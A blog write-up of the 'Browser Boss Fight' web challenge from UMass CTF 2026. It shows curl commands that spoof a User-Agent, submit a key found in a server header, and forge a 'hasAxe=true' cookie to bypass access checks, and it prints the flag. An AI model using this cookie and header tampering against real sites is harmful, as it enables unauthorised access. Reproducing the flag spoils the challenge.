UMass CTF 2026 - Browser Boss Fight

Posted on 2026-04-13 In ctf Views: Disqus:

This familiar brick castle is hiding something… can you break in and defeat the Koopa King?

这座熟悉的砖砌城堡隐藏着什么……您能闯进去打败库巴王吗？

Initial Analysis

The challenge presents a Bowser-themed web portal. A quick look at the page source reveals client-side JavaScript that sabotages any login attempt by replacing the input key with WEAK_NON_KOOPA_KNOCK on submission.

document.getElementById('key-form').onsubmit = function() {
    const knockOnDoor = document.getElementById('key');
    // It replaces whatever they typed with 'WEAK_NON_KOOPA_KNOCK'
    knockOnDoor.value = "WEAK_NON_KOOPA_KNOCK";
    return true;
};

This implies we need to interact with the server directly, bypassing the browser’s UI logic.

Solution

Reconnaissance: Checking the HTTP response headers with curl -v reveals a hidden message from Kamek: Server: BrOWSERS CASTLE (A note outside: "King Koopa, if you forget the key, check under_the_doormat! - Sincerely, your faithful servant, Kamek")

The key appears to be under_the_doormat.
Authentication Bypass: The challenge title and theme suggest the server expects a specific identity. Using the User-Agent Bowser and the discovered key, we can attempt a login:
1
2
3
curl -v -c cookies.txt -L http://browser-boss-fight.web.ctf.umasscybersec.org:32770/password-attempt \
-A "Bowser" \
-d "key=under_the_doormat"
The -c cookies.txt flag saves the session cookie for subsequent requests.
Defeating the Boss (Cookie Manipulation): Upon redirecting to /bowsers_castle.html, the page claims the “axe” has been removed to prevent defeat. Inspecting the cookies reveals a hasAxe=false value. To proceed, we must manually override this cookie to true:
1
2
3
curl -v -b cookies.txt -b "hasAxe=true" \
-A "Bowser" \
-L http://browser-boss-fight.web.ctf.umasscybersec.org:32770/bowsers_castle.html
Victory: With the manipulated cookie, the server renders the victory page containing the flag.

Flag

UMASS{br0k3n_1n_2_b0wz3r5_c4st13}